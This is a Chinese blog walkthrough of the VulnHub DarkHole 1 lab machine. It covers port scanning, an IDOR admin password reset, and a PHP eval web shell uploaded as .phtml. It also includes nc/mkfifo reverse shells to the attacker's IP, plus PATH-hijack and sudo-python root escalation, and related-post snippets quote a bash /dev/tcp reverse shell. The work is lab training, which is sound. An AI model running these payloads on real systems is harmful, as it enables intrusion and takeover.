VulnHub—DarkHole_ 1

已于 2024-01-09 16:29:17 修改
阅读量120 收藏 1
点赞数
分类专栏: 靶机实操 文章标签: 网络安全 安全 web安全
于 2023-07-09 19:23:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76786857/article/details/131623930
版权

靶机下载地址为:DarkHole: 2 ~ VulnHub

靶机IP:192.168.245.143

测试机系统:kali、win10

测试机IP:192.168.245.139

1.信息搜集与利用

1.1主机发现

nmap -sP 192.168.245.0/24

 发现靶机IP:192.168.245.143

1.2扫描IP端口服务

Nmap 探测该IP的端口和服务

nmap -A -P 192.168.245.143

靶机开启22和80端口,先访问一下80端口,显示为一个站点。

 2.漏洞挖掘

访问一下80端口,显示为一个站点。

 查看页面和审计页面源码,并没有发现关键信息。

点击login,进入登录页面

 尝试一下注册个账号

点击sign up now,然后注册一个账号(test:123456)。

注册成功后,登录进去系统。

 仅有更新个人信息和密码功能。

3、越权操作

更新一下密码,并使用BP抓包。

尝试是否存在越权操作漏洞,修改参数id=1 

事实证明,存在越权操作漏洞,且我们已经修改了id=1的账户(admin)的密码为123456。

使用管理员账户(admin:123456)登录系统,多了一个文件上传功能。

4、文件上传获取shell 

首先上传一个php文件,内容为:

<?php eval($_POST[lbwnb]);?>

但是出现报错,猜测是做了黑名单检测。

 将后缀名改为.phtml,再次上传,上传成功,且暴露了上传路径。

 

使用蚁剑连接,获取到shell

 5、反弹shell至kali

新建文件xxx.sh,并赋予执行权限,内容为

mknod backdoor p && nc 192.168.245.139 4444 0<backdoor | /bin/bash 1>backdoor

 在kali中开启监听

nc -lvvp 4444

在蚁剑虚拟终端中输入这条命令

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.245.139 4444 >/tmp/f

kali中反弹成功

升级成交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

 6.权限提升

通过find命令查找具有suid权限的文件

cd /home/john
find / -perm -u=s -type f 2>/dev/null

 使用PATH 变量进行权限提升,拿到john权限

echo $PATH
echo "/bin/bash" >/tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
echo $PATH
./toto
whoami

 通过ls -l ,查看user拿到第一个flag,查看password拿到密码

 

 通过sudo -l,看到提升root的提示

 在file.py 文件中写入 import pty;pty.spawn("/bin/bash")

#file.py
echo 'import pty;pty.spawn("/bin/bash")' > file.py
cat file.py

提权至root成功

sudo python3 /home/john/file.py
id
cd /root
cat root.txt

 

廾匸0705
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
VulnHub-DarkHole_2靶机实战(超详细保姆级教程),2024年最新普通二本的辛酸网络安全面试之路
2401_84184567的博客
04-10 264
321。
VulnHubDarkHole_ 2
2301_76786857的博客
06-19 74
靶机下载地址为:vulnhub-DARKHOLE: 2靶机IP:192.168.245.140测试机系统:kali、win10测试机IP:192.168.245.139。
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3098
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
VulnHub——DarkHole_2
weixin_52512479的博客
08-03 157
IP:192.168.197.136,开启端口:22、80查看80端口存在登录界面,这里需要输入邮箱,密码。。。
VulnHub-DarkHole_ 2靶机详细渗透过程
MRS_jianai的博客
12-29 945
VulnHub-DarkHole: 2靶机详细渗透过程
vulnhubdarkhole_2
weixin_54431413的博客
07-04 477
首先进行了下载了.git,对其中各个版本源码来审计,拿到后台登录权限,之后利用sql注入拿到jhead的密码。通过对.bash_history的查看,发现了本地执行用户为lucy的9999的命令执行漏洞,水平提权到lucy,通过对lama的暴力破解拿到root,通过lucy的sudo提权...
Vulnhub_Darkhole_2
qq_45434762的博客
12-04 445
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关。主机信息kali:192.168.31.136 Darkhole_2:192.168.31.72信息收集使用netdicover发现目标主机IP为192.168.31.72然后使用nmap对目标机器进...
Vulnhub靶机:DARKHOLE_ 2
LainWith的博客
09-14 1267
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
VulnHub-DarkHole_1靶机详细渗透教程
MRS_jianai的博客
12-30 1957
VulnHub-DarkHole:1靶机详细渗透教程
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
VulnHub靶场MONEYBOX:1
01-05
MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在...
vulnhub靶场库中 DC:1
07-06
针对初学者对vulnhub靶场库中DC:1有一定的认知和了解,你会学到一些东西的
vulnhub-Nagini.txt
06-10
Nagini
Vulnhub篇potato.zip
01-12
Vulnhub篇potato靶机,靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8262
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
云端数据提取:安全、高效地利用无限资源
Shaidou_Data的博客
05-30 731
随着技术的不断进步和安全威胁的不断演变,企业和组织必须持续关注和更新他们的数据处理策略,以应对未来可能出现的新挑战。然而,随着数据的指数级增长,数据的安全性和高效的数据处理成为了企业最为关心的议题之一。在云计算环境中,数据安全面临着多方面的挑战,包括但不限于未经授权的数据访问、数据泄露、以及数据在传输过程中的截取等。数据提取是数据处理流程中的第一步,它涉及从各种源系统中检索所需数据的过程。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 1105
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
跨区域文件管控过程中 如何保障安全和效率?
最新发布
文件数据安全交换
06-03 397
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
vulnhub靶场 planets
08-28
vulnhub靶场"planets"是一个信息搜集与利用的主机发现的靶场。你可以在找到更多关于该靶场的详细信息。 根据辐射测年估计和其他证据,地球形成于45亿年前。在地球历史的最初10亿年里,生命出现在海洋中,并开始影响地球的大气层和表面,导致厌氧生物和后来的需氧生物的扩散。一些地质证据表明,生命可能早在41亿年前就出现了。 如果你想登录vulnhub靶场"planets"的管理员界面,你可以使用用户名"terra"和密码"earthclimatechangebad4humans"登录https://earth.local/admin。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [vulnhub靶场——THE PLANETS:EARTH](https://blog.csdn.net/Czheisenberg/article/details/122900121)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH](https://blog.csdn.net/qq_57976347/article/details/122695436)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

廾匸0705

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值